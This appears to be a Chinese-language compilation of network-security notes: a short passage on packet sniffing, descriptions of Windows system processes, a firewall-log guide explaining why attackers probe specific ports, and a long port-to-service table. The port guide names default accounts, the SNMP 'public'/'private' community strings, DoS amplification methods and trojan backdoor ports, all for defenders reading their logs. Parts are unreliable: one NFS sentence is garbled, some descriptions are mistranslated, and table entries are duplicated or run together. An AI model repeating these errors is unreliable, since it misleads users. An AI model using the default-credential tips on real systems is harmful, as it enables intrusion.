  首先,网络监听软件运行时,需要消耗大量的处理器时间,如果在此时,就详细地分析包中的内容,许多包就会来不信接收而漏掉。因此,网络监听软件通常都是将监听到的包存放在文件中,待以后再分析。

  其次,网络中的数据包非常复杂,两台主机之间即使连续发送和接受数据包,在监听到的结果中,中间必然会夹杂了许多别的主机交互的数据包。监听软件将同一 TCP会话的包整理到一起,已经是很不错了。如果还希望将用户的详细信息整理出眯,需要根据协议对包进行大量的分析。面对网络上如此众多的协议,这个监听软件将会十分庞大。

  其实,找这些信息并不是一件难事。只要根据一定的规律,很容易将有用的信息一一提取出来。

  系统进程信息

  [system process] - [system process] - 进程信息

  进程文件: [system process] or [system process]

  进程名称: Windows内存处理系统进程

  描述: Windows页面内存管理进程,拥有0级优先。

  alg - alg.exe - 进程信息

  进程文件: alg or alg.exe

  进程名称: 应用层网关服务

  描述: 这是一个应用层网关服务用于网络共享。

  csrss - csrss.exe - 进程信息

  进程文件: csrss or csrss.exe

  进程名称: Client/Server Runtime Server Subsystem

  描述: 客户端服务子系统,用以控制Windows图形相关子系统。

  ddhelp - ddhelp.exe - 进程信息

  进程文件: ddhelp or ddhelp.exe

  进程名称: DirectDraw Helper

  描述: DirectDraw Helper是DirectX这个用于图形服务的一个组成部分。

  dllhost - dllhost.exe - 进程信息

  进程文件: dllhost or dllhost.exe

  进程名称: DCOM DLL Host进程

  描述: DCOM DLL Host进程支持基于COM对象支持DLL以运行Windows程序。

  explorer - explorer.exe - 进程信息

  进程文件: explorer or explorer.exe

  进程名称: 程序管理

  描述: Windows Program Manager或者Windows Explorer用于控制Windows图形Shell,包括开始菜单、任务栏,桌面和文件管理。

  inetinfo - inetinfo.exe - 进程信息

  进程文件: inetinfo or inetinfo.exe

  进程名称: IIS Admin Service Helper

  描述: InetInfo是Microsoft Internet Infomation Services (IIS)的一部分,用于Debug调试除错。

  internat - internat.exe - 进程信息

  进程文件: internat or internat.exe

  进程名称: Input Locales

  描述: 这个输入控制图标用于更改类似国家设置、键盘类型和日期格式。

  kernel32 - kernel32.dll - 进程信息

  进程文件: kernel32 or kernel32.dll

  进程名称: Windows壳进程

  描述: Windows壳进程用于管理多线程、内存和资源。

  lsass - lsass.exe - 进程信息

  进程文件: lsass or lsass.exe

  进程名称: 本地安全权限服务

  描述: 这个本地安全权限服务控制Windows安全机制。

  mdm - mdm.exe - 进程信息

  进程文件: mdm or mdm.exe

  进程名称: Machine Debug Manager

  描述: Debug除错管理用于调试应用程序和Microsoft Office中的Microsoft script Editor脚本编辑器。

  mmtask - mmtask.tsk - 进程信息

  进程文件: mmtask or mmtask.tsk

  进程名称: 多媒体支持进程

  描述: 这个Windows多媒体后台程序控制多媒体服务,例如MIDI。

  mprexe - mprexe.exe - 进程信息

  进程文件: mprexe or mprexe.exe

  进程名称: Windows路由进程

  描述: Windows路由进程包括向适当的网络部分发出网络请求。

  msgsrv32 - msgsrv32.exe - 进程信息

  进程文件: msgsrv32 or msgsrv32.exe

  进程名称: Windows信使服务

  描述: Windows信使服务调用Windows驱动和程序管理在启动。

  mstask - mstask.exe - 进程信息

  进程文件: mstask or mstask.exe

  进程名称: Windows计划任务

  描述: Windows计划任务用于设定继承在什么时间或者什么日期备份或者运行。

  regsvc - regsvc.exe - 进程信息

  进程文件: regsvc or regsvc.exe

  进程名称: 远程注册表服务

  描述: 远程注册表服务用于访问在远程计算机的注册表。

  rpcss - rpcss.exe - 进程信息

  进程文件: rpcss or rpcss.exe

  进程名称: RPC Portmapper

  描述: Windows 的RPC端口映射进程处理RPC调用(远程模块调用)然后把它们映射给指定的服务提供者。

  services - services.exe - 进程信息

  进程文件: services or services.exe

  进程名称: Windows Service Controller

  描述: 管理Windows服务。

  smss - smss.exe - 进程信息

  进程文件: smss or smss.exe

  进程名称: Session Manager Subsystem

  描述: 该进程为会话管理子系统用以初始化系统变量,MS-DOS驱动名称类似LPT1以及COM,调用Win32壳子系统和运行在Windows登陆过程。

  snmp - snmp.exe - 进程信息

  进程文件: snmp or snmp.exe

  进程名称: Microsoft SNMP Agent

  描述: Windows简单的网络协议代理(SNMP)用于监听和发送请求到适当的网络部分。

  spool32 - spool32.exe - 进程信息

  进程文件: spool32 or spool32.exe

  进程名称: Printer Spooler

  描述: Windows打印任务控制程序,用以打印机就绪。

  spoolsv - spoolsv.exe - 进程信息

  进程文件: spoolsv or spoolsv.exe

  进程名称: Printer Spooler Service

  描述: Windows打印任务控制程序,用以打印机就绪。

  stisvc - stisvc.exe - 进程信息

  进程文件: stisvc or stisvc.exe

  进程名称: Still Image Service

  描述: Still Image Service用于控制扫描仪和数码相机连接在Windows。

  svchost - svchost.exe - 进程信息

  进程文件: svchost or svchost.exe

  进程名称: Service Host Process

  描述: Service Host Process是一个标准的动态连接库主机处理服务。

  system - system - 进程信息

  进程文件: system or system

  进程名称: Windows System Process

  描述: Microsoft Windows系统进程。

  taskmon - taskmon.exe - 进程信息

  进程文件: taskmon or taskmon.exe

  进程名称: Windows Task Optimizer

  描述: windows任务优化器监视你使用某个程序的频率,并且通过加载那些经常使用的程序来整理优化硬盘。

  tcpsvcs - tcpsvcs.exe - 进程信息

  进程文件: tcpsvcs or tcpsvcs.exe

  进程名称: TCP/IP Services

  描述: TCP/IP Services Application支持透过TCP/IP连接局域网和Internet。

  winlogon - winlogon.exe - 进程信息

  进程文件: winlogon or winlogon.exe

  进程名称: Windows Logon Process

  描述: Windows NT用户登陆程序。

  winmgmt - winmgmt.exe - 进程信息

  进程文件: winmgmt or winmgmt.exe

  进程名称: Windows Management Service

  描述: Windows Management Service透过Windows Management Instrumentation data (WMI)技术处理来自应用客户端的请求

  

  端口全解析(上)

  端口可分为3大类:

  1) 公认端口(Well Known Ports):从0到1023,它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。

  2) 注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。

  3) 动态和/或私有端口(Dynamic and/or Private Ports):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。

  本节讲述通常TCP/UDP端口扫描在防火墙记录中的信息。记住:并不存在所谓ICMP端口。如果你对解读ICMP数据感兴趣,请参看本文的其它部分。 0通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描:使用IP地址为 0.0.0.0,设置ACK位并在以太网层广播。 1 tcpmux 这显示有人在寻找SGIIrix机器。Irix是实现tcpmux的主要提供者,缺省情况下tcpmux在这种系统中被打开。Iris机器在发布时含有几个缺省的无密码的帐户,如lp,guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox, 和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux 并利用这些帐户。 7Echo你能看到许多人们搜索Fraggle放大器时,发送到x.x.x.0和x.x.x.255的信息。常见的一种DoS攻击是echo循环(echo-loop),攻击者伪造从一个机器发送到另一个UDP数据包,而两个机器分别以它们最快的方式回应这些数据包。(参见Chargen)另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做Resonate Global Dispatch”,它与DNS的这一端口连接以确定最近的路由。Harvest/squid cache将从3130端口发送UDPecho:“如果将cache的source_ping on选项打开,它将对原始主机的UDP echo端口回应一个HIT reply。”这将会产生许多这类数据包。

  11 sysstat这是一种UNIX服务,它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信息而威胁机器的安全,如暴露已知某些弱点或帐户的程序。这与UNIX系统中“ps”命令的结果相似再说一遍:ICMP没有端口,ICMP port 11通常是ICMPtype=1119 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时,会发送含有垃圾字符的数据流知道连接关闭。 Hacker利用IP欺骗可以发动DoS攻击伪造两个chargen服务器之间的UDP由于服务器企图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样 fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。

  21 ftp最常见的攻击者用于寻找打开“anonymous”的ftp服务器的方法。这些服务器带有可读写的目录。Hackers或tackers利用这些服务器作为传送warez (私有程序) 和pr0n(故意拼错词而避免被搜索引擎分类)的节点。

  22 sshPcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式,许多使用RSAREF库的版本有不少漏洞。(建议在其它端口运行ssh)还应该注意的是ssh工具包带有一个称为ake-ssh-known-hosts的程序。它会扫描整个域的 ssh主机。你有时会被使用这一程序的人无意中扫描到。UDP(而不是TCP)与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。 5632 (十六进制的0x1600)位交换后是0x0016(使进制的22)。

  23 Telnet入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的操作系统。此外使用其它技术,入侵者会找到密码。

  25 smtp攻击者(spammer)寻找SMTP服务器是为了传递他们的spam。入侵者的帐户总被关闭,他们需要拨号连接到高带宽的e-mail服务器上,将简单的信息传递到不同的地址。SMTP服务器(尤其是sendmail)是进入系统的最常用方法之一,因为它们必须完整的暴露于Internet且邮件的路由是复杂的(暴露+复杂=弱点)。

  53 DNSHacker或crackers可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其它通讯。因此防火墙常常过滤或记录53端口。需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常使用这种方法穿透防火墙。

  67和68 Bootp和DHCPUDP上的Bootp/DHCP:通过DSL和cable-modem的防火墙常会看见大量发送到广播地址 255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的“中间人”(man-in-middle)攻击。客户端向68端口(bootps)广播请求配置,服务器向67端口(bootpc)广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。69 TFTP(UDP) 许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常错误配置而从系统提供任何文件,如密码文件。它们也可用于向系统写入文件

  79 finger Hacker用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其它机器finger扫描。

  98 linuxconf 这个程序提供linuxboxen的简单管理。通过整合的HTTP服务器在98端口提供基于Web界面的服务。它已发现有许多安全问题。一些版本 setuidroot,信任局域网,在/tmp下建立Internet可访问的文件,LANG环境变量有缓冲区溢出。此外因为它包含整合的服务器,许多典型的HTTP漏洞可能存在(缓冲区溢出,历遍目录等)109 POP2并不象POP3那样有名,但许多服务器同时提供两种服务(向后兼容)。在同一个服务器上POP3的漏洞在POP2中同样存在。

  110 POP3用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少有20个(这意味着Hacker可以在真正登陆前进入系统)。成功登陆后还有其它缓冲区溢出错误。

  111 sunrpc portmap rpcbind Sun RPCPortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。常见RPC服务有:pc.mountd, NFS, rpc.statd, rpc.csmd, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提供服务的特定端口测试漏洞。记住一定要记录线路中的daemon, IDS, 或sniffer,你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。

  113 Ident auth .这是一个许多机器上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息(会被Hacker利用)。但是它可作为许多服务的记录器,尤其是FTP, POP, IMAP, SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务,你将会看到许多这个端口的连接请求。记住,如果你阻断这个端口客户端会感觉到在防火墙另一边与e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回T,着将回停止这一缓慢的连接。

  119 NNTP news新闻组传输协议,承载USENET通讯。当你链接到诸如:news:p.security.firewalls/. 的地址时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送spam。

  135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC end- point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和/或RPC的服务利用机器上的end-point mapper注册它们的位置。远端客户连接到机器时,它们查询end-point mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如:这个机器上运 行Exchange Server吗?是什么版本?这个端口除了被用来查询服务(如使用epdump)还可以被用于直接攻击。有一些DoS攻击直接针对这个端口。

  137 NetBIOS name service nbtstat (UDP)这是防火墙管理员最常见的信息,请仔细阅读文章后面的NetBIOS一节 139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows“文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。大量针对这一端口始于1999,后来逐渐变少。2000年又有回升。一些vbs(IE5 VisualBasicscripting)开始将它们自己拷贝到这个端口,试图在这个端口繁殖。

  143 IMAP和上面POP3的安全问题一样,许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住:一种Linux蠕虫(admw0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP后,这些漏洞变得流行起来。 Morris蠕虫以后这还是第一次广泛传播的蠕虫。这一端口还被用于IMAP2,但并不流行。已有一些报道发现有些0到143端口的攻击源于脚本。

  161 SNMP(UDP)入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都储存在数据库中,通过SNMP客获得这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用缺省的密码“public”“private”访问系统。他们可能会试验所有可能的组合。 SNMP包可能会被错误的指向你的网络。Windows机器常会因为错误配置将HP JetDirect rmote management软件使用SNMP。HP OBJECT IDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名,你会看见这种包在子网内广播(cable modem, DSL)查询sysName和其它信息。

  162 SNMP trap 可能是由于错误配置

  177 xdmcp 许多Hacker通过它访问X-Windows控制台,它同时需要打开6000端口。

  513 rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供 了很有趣的信息

  553 CORBA IIOP (UDP) 如果你使用cable modem或DSL VLAN,你将会看到这个端口的广播。CORBA是一种面向对象的RPC(remote procedure call)系统。Hacker会利用这些信息进入系统。 600 Pcserver backdoor 请查看1524端口一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统-- Alan J. Rosenthal.

  端口全解析(下)

  635 mountd Linux的mountd Bug。这是人们扫描的一个流行的Bug。大多数对这个端口的扫描是基于UDP的,但基于TCP 的mountd有所增加(mountd同时运行于两个端口)。记住,mountd可运行于任何端口(到底在哪个端口,需要在端口111做portmap查询),只是Linux默认为635端口,就象NFS通常运行于2049端口1024 许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个端口连接网络,它们请求操作系统为它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。这意味着第一个向系统请求分配动态端口的程序将被分配端口1024。为了验证这一点,你可以重启机器,打开Telnet,再打开一个窗口运行“natstat -a”,你将会看到Telnet被分配1024端口。请求的程序越多,动态端口也越多。操作系统分配的端口将逐渐变大。再来一遍,当你浏览Web页时用 “netstat”查看,每个Web页需要一个新端口。

  1025 参见1024

  1080 SOCKS 这一协议以管道方式穿过防火墙,允许防火墙后面的许多人通过一个IP地址访问Internet。理论上它应该只允许内部的通信向外达到Internet。但是由于错误的配置,它会允许Hacker/Cracker的位于防火墙外部的攻击穿过防火墙。或者简单地回应位于Internet上的计算机,从而掩饰他们对你的直接攻击。 WinGate是一种常见的Windows个人防火墙,常会发生上述的错误配置。在加入IRC聊天室时常会看到这种情况。

  1114 SQL 系统本身很少扫描这个端口,但常常是sscan脚本的一部分。

  1243 Sub-7木马(TCP)参见Subseven部分。

  1524 ingreslock后门 许多攻击脚本将安装一个后门Sh*ll 于这个端口(尤其是那些针对Sun系统中Sendmail和RPC服务漏洞的脚本,如statd,ttdbserver和cmsd)。如果你刚刚安装了你的防火墙就看到在这个端口上的连接企图,很可能是上述原因。你可以试试Telnet到你的机器上的这个端口,看看它是否会给你一个Sh*ll 。连接到600/pcserver也存在这个问题。

  2049 NFS NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪个端口,但是大部分情况是安装后NFS杏谡飧龆丝冢acker/Cracker因而可以闭开portmapper直接测试这个端口。

  3128 squid 这是Squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。你也会看到搜索其它代理服务器的端口: 000/8001/8080/8888。扫描这一端口的另一原因是:用户正在进入聊天室。其它用户(或服务器本身)也会检验这个端口以确定用户的机器是否支持代理。请查看5.3节。

  5632 pcAnywere你会看到很多这个端口的扫描,这依赖于你所在的位置。当用户打开pcAnywere时,它会自动扫描局域网C类网以寻找可能得代理(译者:指agent而不是proxy)。Hacker/cracker也会寻找开放这种服务的机器,所以应该查看这种扫描的源地址。一些搜寻 pcAnywere的扫描常包含端口22的UDP数据包。参见拨号扫描。

  6776 Sub-7 artifact 这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者通过电话线控制另一台机器,而被控机器挂断时你将会看到这种情况。因此当另一人以此IP拨入时,他们将会看到持续的,在这个端口的连接企图。(译者:即看到防火墙报告这一端口的连接企图时,并不表示你已被Sub-7控制。)6970 RealAudio RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP7070端口外向控制连接设置13223 PowWow PowWow 是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的接。这一程序对于建立连接非常具有“进攻性”。它会“驻扎”在这一TCP端口等待回应。这造成类似心跳间隔的连接企图。如果你是一个拨号用户,从另一个聊天者手中“继承”了IP地址这种情况就会发生:好象很多不同的人在测试这一端口。这一协议使用 “OPNG”作为其连接企图的前四个字节。

  17027 Conducent这是一个外向连接。这是由于公司内部有人安装了带有Conducent "adbot" 的共享软件。Conducent "adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。有人试验:阻断这一外向连接不会有任何问题,但是封掉IP地址本身将会导致adbots持续在每秒内试图连接多次而导致连接过载:机器会不断试图解析DNS名─ads.conducent.com,即IP地址216.33.210.40 ; 216.33.199.77 ;216.33.199.80 ;216.33.199.81;216.33.210.41。(译者:不知NetAnts使用的Radiate是否也有这种现象)

  27374 Sub-7木马(TCP) 参见Subseven部分。

  30100 NetSphere木马(TCP) 通常这一端口的扫描是为了寻找中了NetSphere木马。

  31337 Back Orifice “eliteHacker中31337读做“elite”/ei’li:t/(译者:法语,译为中坚力量,精华。即 3=E, 1=L, 7=T)。因此许多后门程序运行于这一端口。其中最有名的是Back Orifice。曾经一段时间内这是Internet上最常见的扫描。现在它的流行越来越少,其它的 木马程序越来越流行。

  31789 Hack-a-tack 这一端口的UDP通讯通常是由于"Hack-a-tack"远程访问木马(RAT,Remote Access Trojan)。这种木马包含内置的31790端口扫描器,因此任何31789端口到317890端口的连接意味着已经有这种入侵。(31789端口是控制连接,317890端口是文件传输连接)

  32770~32900 RPC服务 Sun Solaris的RPC服务在这一范围内。详细的说:早期版本的Solaris(2.5.1之前)将 portmapper置于这一范围内,即使低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。扫描这一范围内的端口不是为了寻找portmapper,就是为了寻找可被攻击的已知的RPC服务。

  33434~33600 traceroute 如果你看到这一端口范围内的UDP数据包(且只在此范围之内)则可能是由于traceroute。参见traceroute分。

  41508 Inoculan早期版本的Inoculan会在子网内产生大量的UDP通讯用于识别彼此。参见http://www.circlemud.org/~jelson/software/udpsend.html

  http://www.ccd.bnl.gov/nss/tips/inoculan/index.html

  端口1~1024是保留端口,所以它们几乎不会是源端口。但有一些例外,例如来自NAT机器的连接。常看见紧接着1024的端口,它们是系统分配给那些并不在乎使用哪个端口连接的应用程序的“动态端口”。 Server Client 服务描述

  1-5/tcp 动态 FTP 1-5端口意味着sscan脚本

  20/tcp 动态 FTP FTP服务器传送文件的端口

  53 动态 FTP DNS从这个端口发送UDP回应。你也可能看见源/目标端口的TCP连接。

  123 动态 S/NTP 简单网络时间协议(S/NTP)服务器运行的端口。它们也会发送到这个端口的广播。

  27910~27961/udp 动态 Quake Quake或Quake引擎驱动的游戏在这一端口运行其服务器。因此来自这一端口范围的UDP包或发送至这一端口范围的UDP包通常是游戏。

  61000以上 动态 FTP 61000以上的端口可能来自Linux NAT服务器(IP asquerade)

  

  端口详细说明表(上)

  1 tcpmux TCPPortServiceMultiplexer 传输控制协议端口服务多路开关选择器

  2 compressnet ManagementUtility  compressnet管理实用程序

  3 compressnet CompressionProcess  压缩进程

  5 rje RemoteJobEntry    远程作业登录

  7 echo Echo      回显

  9 discard Discard    丢弃

  11 systat ActiveUsers    在线用户

  13 daytime Daytime     时间

  17 qotd QuoteoftheDay   每日引用

  18 msp MessageSendProtocol   消息发送协议

  19 chargen CharacterGenerator  字符发生器

  20 ftp-data FileTransfer[DefaultData] 文件传输协议(默认数据口)

  21 ftp FileTransfer[Control]   文件传输协议(控制)

  22 ssh SSHRemoteLoginProtocol  SSH远程登录协议

  23 telnet Telnet    终端仿真协议

  24 anyprivatemailsystem   预留给个人用邮件系统

  25 smtp SimpleMailTransfer   简单邮件发送协议

  27 nsw-fe NSWUserSystemFE   NSW用户系统现场工程师

  29 msg-icp MSGICP     MSG ICP

  31 msg-auth MSGAuthentication  MSG验证

  33 dsp DisplaySupportProtocol  显示支持协议

  35 anyprivateprinterserver  预留给个人打印机服务

  37 time Time      时间

  38 rap RouteAccessProtocol   路由访问协议

  39 rlp ResourceLocationProtocol  资源定位协议

  41 graphics Graphics    图形

  42 nameserver WINSHostNameServer  WINS主机名服务

  43 nicname WhoIs    "绰号"whois服务

  44 mpm-flags MPMFLAGSProtocol  MPM(消息处理模块)标志协议

  45 mpm MessageProcessingModule[recv] 消息处理模块

  46 mpm-snd MPM[defaultsend]   消息处理模块(默认发送口)

  47 ni-ftp NIFTP    NIFTP

  48  auditd DigitalAuditDaemon  数码音频后台服务49 tacacs LoginHostProtocol(TACACS)  TACACS登录主机协议50 re-mail-ckRemoteMailCheckingProtocol 远程邮件检查协议[未结束]

  51 la-maint IMPLogicalAddressMaintenance IMP(接口信息处理机)逻辑地址维护

  52 xns-time XNSTimeProtocol   施乐网络服务系统时间协议

  53 domain DomainNameServer   域名服务器

  54 xns-ch XNSClearinghouse    施乐网络服务系统票据交换55 isi-gl ISIGraphicsLanguage  ISI图形语言

  56 xns-auth XNSAuthentication  施乐网络服务系统验证

  57  anyprivateterminalaccess  预留个人用终端访问

  58 xns-mail XNSMail    施乐网络服务系统邮件

  59 anyprivatefileservice   预留个人文件服务

  60 Unassigned     未定义

  61 ni-mail NIMAIL     NI邮件

  62 acas ACAServices    异步通讯适配器服务

  63 whois+whois+     WHOIS+

  64 covia CommunicationsIntegrator(CI) 通讯接口

  65 tacacs-ds TACACS-DatabaseService  TACACS数据库服务

  66 sql*net OracleSQL*NET   OracleSQL*NET

  67 bootps BootstrapProtocolServer  引导程序协议服务端

  68 bootpc BootstrapProtocolClient  引导程序协议客户端

  69 tftp TrivialFileTransfer   小型文件传输协议

  70 gopher Gopher    信息检索协议

  71 netrjs-1 RemoteJobService  远程作业服务

  72 netrjs-2 RemoteJobService  远程作业服务

  73 netrjs-3 RemoteJobService  远程作业服务

  74 netrjs-4 RemoteJobService  远程作业服务

  75 anyprivatedialoutservice  预留给个人拨出服务

  76deos DistributedExternalObjectStore分布式外部对象存储

  77 anyprivateRJEservice   预留给个人远程作业输入服务

  78 vettcp vettcp    修正TCP

  79 finger Finger    查询远程主机在线用户等信息

  80 http WorldWideWebHTTP    全球信息网超文本传输协议81 hosts2-ns HOSTS2NameServer  HOST2名称服务

  82 xfer XFERUtility    传输实用程序

  83 mit-ml-dev MITMLDevice    模块化智能终端ML设备

  84 ctf CommonTraceFacility   公用追踪设备

  85 mit-ml-dev MITMLDevice    模块化智能终端ML设备

  86 mfcobol MicroFocusCobol   MicroFocusCobol编程语言

  87 anyprivateterminallink  预留给个人终端连接

  88 kerberos Kerberos    Kerberros安全认证系统

  89 su-mit-tg SU/MITTelnetGateway  SU/MIT终端仿真网关

  90 dnsix DNSIXSecuritAttributeTokenMap DNSIX安全属性标记图91 mit-dov MITDoverSpooler   MITDover假脱机

  92 npp NetworkPrintingProtocol  网络打印协议

  93 dcp DeviceControlProtocol  设备控制协议

  94 objcall TivoliObjectDispatcher  Tivoli对象调度

  95 supdup SUPDUP

  96 dixie DIXIEProtocolSpecification  DIXIE协议规范

  97ft-rvfftRemoteVirturalFileProtocol)快速远程虚拟文件协议98 tacnews TACNews     TAC新闻协议

  99 metagram MetagramRelay

  100 newacct [unauthorizeduse]

  101=NICHostNameServer

  102=ISO-TSAP

  103=GenesisPoint-to-PointTransNet

  104=ACR-NEMADigitalImag.&Comm.300

  105=MailboxNameNameserver

  106=3COM-TSMUX3com-tsmux

  107=RemoteTelnetService

  108=SNAGatewayAccessServer

  109=PostOfficeProtocol-Version2

  110=PostOfficeProtocol-Version3

  111=SUNRPC

  112=McIDASDataTransmissionProtocol

  113=AuthenticationService

  114=AudioNewsMulticast

  115=SimpleFileTransferProtocol

  116=ANSAREXNotify

  117=UUCPPathService

  118=SQLServicessqlserv

  119=NetworkNewsTransferProtocol

  120=CFDPTKTcfdptkt

  121=EncoreExpeditedRemotePro.Call

  122=SMAKYNETsmakynet

  123=NetworkTimeProtocol

  124=ANSAREXTrader

  125=LocusPC-InterfaceNetMapSer

  126=UnisysUnitaryLogin

  127=LocusPC-InterfaceConnServer

  128=GSSXLicenseVerification

  129=PasswordGeneratorProtocol

  130=ciscoFNATIVE

  131=ciscoTNATIVE

  132=ciscoSYSMAINT

  133=StatisticsService

  134=INGRES-NETService

  135=LocationService

  136=PROFILENamingSystem

  137=NETBIOSNameService

  138=NETBIOSDatagramService

  139=NETBIOSSessionService

  140=EMFISDataService

  141=EMFISControlService

  142=Britton-LeeIDM

  143=InterimMailAccessProtocolv2

  144=NewSnews

  145=UAACProtocoluaac

  146=ISO-IP0iso-tp0

  147=ISO-IPiso-ip

  148=CRONUS-SUPPORT

  149=AED512EmulationService

  150=SQL-NETsql-net

  151=HEMShems

  152=BackgroundFileTransferProgram

  153=SGMPsgmp

  154=NETSCnetsc-prod

  155=NETSCnetsc-dev

  156=SQLService

  157=KNET/VMCommand/MessageProtocol

  158=PCMailServerpcmail-srv

  159=NSS-Routingnss-routing

  160=SGMP-TRAPSsgmp-traps

  161=SNMP

  162=SNMPTRAP

  163=CMIP/TCPManager

  164=CMIP/TCPAgent

  165=Xeroxxns-courier

  166=SiriusSystems

  167=NAMPnamp

  168=RSVDrsvd

  169=Send

  170=NetworkPostscript

  170=NetworkPostscript

  171=NetworkInnovationsMultiplex

  172=NetworkInnovationsCL/1

  173=Xyplexxyplex-mux

  174=MAILQ

  175=VMNET

  176=GENRAD-MUXgenrad-mux

  177=XDisplayManagerControlProtocol

  178=NextStepWindowServer

  179=BorderGatewayProtocol

  180=Intergraphris

  181=Unifyunify

  182=UnisysAuditSITP

  183=OCBinderocbinder

  184=OCServerocserver

  185=Remote-KIS

  186=KISProtocolkis

  187=ApplicationCommunicationInterface

  188=PlusFive’sMUMPS

  189=QueuedFileTransport

  189=QueuedFileTransport

  190=GatewayAccessControlProtocol

  190=GatewayAccessControlProtocol

  191=ProsperoDirectoryService

  191=ProsperoDirectoryService

  192=OSUNetworkMonitoringSystem

  193=srmp,SpiderRemoteMonitoringProtocol

  194=irc,InternetRelayChatProtocl

  195=DNSIXNetworkLevelModuleAudit

  196=DNSIXSessionMgtModuleAuditRedir

  197=DirectoryLocationService

  198=DirectoryLocationServiceMonitor

  199=SMUX

  200=IBMSystemResourceController

  201=at-rtmpAppleTalkRoutingMaintenance

  202=at-nbpAppleTalkNameBinding

  203=at-3AppleTalkUnused

  204=AppleTalkEcho

  205=AppleTalkUnused

  206=AppleTalkZoneInformation

  207=AppleTalkUnused

  208=AppleTalkUnused

  209=TrivialAuthenticatedMailProtocol

  210=ANSIZ39.50z39.50

  211=TexasInstruments914C/GTerminal

  212=ATEXSSTRanet

  213=IPX

  214=VMPWSCSvmpwscs

  215=InsigniaSolutions

  216=AccessTechnologyLicenseServer

  217=dBASEUnix

  218=NetixMessagePostingProtocol

  219=UnisysARPsuarps

  220=InteractiveMailAccessProtocolv3

  221=BerkeleyrlogindwithSPXauth

  222=BerkeleyrshdwithSPXauth

  223=CertificateDistributionCenter

  224=Reserved(224-241)

  241=Reserved(224-241)

  242=Unassigned#

  243=SurveyMeasurement

  244=Unassigned#

  245=LINKlink

  246=DisplaySystemsProtocol

  247-255Reserved

  256-343Unassigned

  344=ProsperoDataAccessProtocol

  345=PerfAnalysisWorkbench

  346=Zebraserverzserv

  347=FatmenServerfatserv

  348=CabletronManagementProtocol

  349-370Unassigned

  371=Clearcaseclearcase

  372=UnixListservulistserv

  373=LegentCorporation

  374=LegentCorporation

  375=Hasslehassle

  376=AmigaEnvoyNetworkInquiryProto

  377=NECCorporation

  378=NECCorporation

  379=TIA/EIA/IS-99modemclient

  380=TIA/EIA/IS-99modemserver

  381=hpperformancedatacollector

  382=hpperformancedatamanagednode

  383=hpperformancedataalarmmanager

  384=ARemoteNetworkServerSystem

  385=IBMApplication

  386=ASAMessageRouterObjectDef.

  387=AppletalkUpdate-BasedRoutingPro.

  388=UnidataLDMVersion4

  389=LightweightDirectoryAccessProtocol

  390=UISuis

